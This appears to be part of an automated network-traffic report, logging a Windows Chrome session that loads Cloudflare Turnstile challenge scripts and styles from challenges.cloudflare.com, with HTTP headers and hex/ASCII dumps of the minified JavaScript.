                                  2024-11-25 23:28:25 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                  2024-11-25 23:28:25 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.449751104.18.94.414432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:25 UTC383OUTGET /turnstile/v0/g/e4025c85ea63/api.js HTTP/1.1
                                  Host: challenges.cloudflare.com
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:25 UTC471INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:28:25 GMT
                                  Content-Type: application/javascript; charset=UTF-8
                                  Content-Length: 47695
                                  Connection: close
                                  accept-ranges: bytes
                                  last-modified: Tue, 19 Nov 2024 14:16:20 GMT
                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                  access-control-allow-origin: *
                                  cross-origin-resource-policy: cross-origin
                                  Server: cloudflare
                                  CF-RAY: 8e856a3eaabe0fa3-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  2024-11-25 23:28:25 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                  Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                  2024-11-25 23:28:25 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                  Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                  2024-11-25 23:28:25 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                  2024-11-25 23:28:25 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                  2024-11-25 23:28:25 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                  2024-11-25 23:28:25 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                  Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                  2024-11-25 23:28:25 UTC1369INData Raw: 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42
                                  Data Ascii: av0/rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUB
                                  2024-11-25 23:28:25 UTC1369INData Raw: 63 74 7c 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72
                                  Data Ascii: ct||Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var
                                  2024-11-25 23:28:25 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                  Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                  2024-11-25 23:28:25 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                  Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.449753104.18.94.414432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:26 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e856a3e49b28c06&lang=auto HTTP/1.1
                                  Host: challenges.cloudflare.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/e00u8/0x4AAAAAAA0rtdv_xNXYa5Om/auto/fbE/normal/auto/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:27 UTC331INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:28:27 GMT
                                  Content-Type: application/javascript; charset=UTF-8
                                  Content-Length: 112591
                                  Connection: close
                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                  Server: cloudflare
                                  CF-RAY: 8e856a491d8643e7-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  2024-11-25 23:28:27 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 50 69 6b 62 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uPikb3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                  2024-11-25 23:28:27 UTC1369INData Raw: 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73
                                  Data Ascii: 0longer%20available","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers
                                  2024-11-25 23:28:27 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 39 32 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 39 36 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 33 38 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 35 32 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 37 34 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 39 35 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 37 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31
                                  Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(392))/1+-parseInt(gI(896))/2*(-parseInt(gI(338))/3)+-parseInt(gI(352))/4+parseInt(gI(274))/5+-parseInt(gI(1095))/6+parseInt(gI(667))/7*(parseInt(gI(11
                                  2024-11-25 23:28:27 UTC1369INData Raw: 35 29 5d 5b 69 30 28 31 31 31 32 29 5d 28 68 29 29 29 2c 78 3d 67 5b 69 30 28 38 34 31 29 5d 5b 69 30 28 33 34 31 29 5d 26 26 67 5b 69 30 28 31 32 36 38 29 5d 3f 67 5b 69 30 28 38 34 31 29 5d 5b 69 30 28 33 34 31 29 5d 28 6e 65 77 20 67 5b 28 69 30 28 31 32 36 38 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 69 32 2c 4a 2c 48 29 7b 69 66 28 69 32 3d 69 30 2c 6f 5b 69 32 28 37 38 33 29 5d 21 3d 3d 6f 5b 69 32 28 37 38 33 29 5d 29 7b 69 66 28 4a 3d 2f 28 63 68 72 6f 6d 65 7c 6d 6f 7a 7c 73 61 66 61 72 69 7c 65 64 67 65 29 2d 65 78 74 65 6e 73 69 6f 6e 3a 5c 2f 5c 2f 2f 2c 4a 5b 69 32 28 33 31 32 29 5d 28 6a 29 29 72 65 74 75 72 6e 21 21 5b 5d 3b 69 66 28 21 44 7c 7c 21 28 42 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 29 7c 7c 21 43 5b 69 32 28 31 34
                                  Data Ascii: 5)][i0(1112)](h))),x=g[i0(841)][i0(341)]&&g[i0(1268)]?g[i0(841)][i0(341)](new g[(i0(1268))](x)):function(G,i2,J,H){if(i2=i0,o[i2(783)]!==o[i2(783)]){if(J=/(chrome|moz|safari|edge)-extension:\/\//,J[i2(312)](j))return!![];if(!D||!(B instanceof E)||!C[i2(14
                                  2024-11-25 23:28:27 UTC1369INData Raw: 29 6f 28 6e 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 27 6f 2e 27 2b 76 7d 29 7d 2c 66 42 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 69 35 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 35 3d 67 4a 2c 67 3d 7b 7d 2c 67 5b 69 35 28 31 30 33 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2d 73 7d 2c 67 5b 69 35 28 39 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2d 73 7d 2c 67 5b 69 35 28 31 32 31 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 26 73 7d 2c 68 3d 67 2c 6d 2c 6a 3d 33 32 2c 6c 3d 65 4d 5b 69 35 28 32 37 31 29 5d 5b 69 35 28 37 35 39 29 5d 2b 27 5f 27 2b 30 2c 6c 3d 6c 5b 69 35 28 34 37 37 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6e
                                  Data Ascii: )o(n);else return'o.'+v})},fB=function(f,i5,g,h,i,j,k,l,m){for(i5=gJ,g={},g[i5(1037)]=function(n,s){return n-s},g[i5(982)]=function(n,s){return n-s},g[i5(1212)]=function(n,s){return n&s},h=g,m,j=32,l=eM[i5(271)][i5(759)]+'_'+0,l=l[i5(477)](/./g,function(n
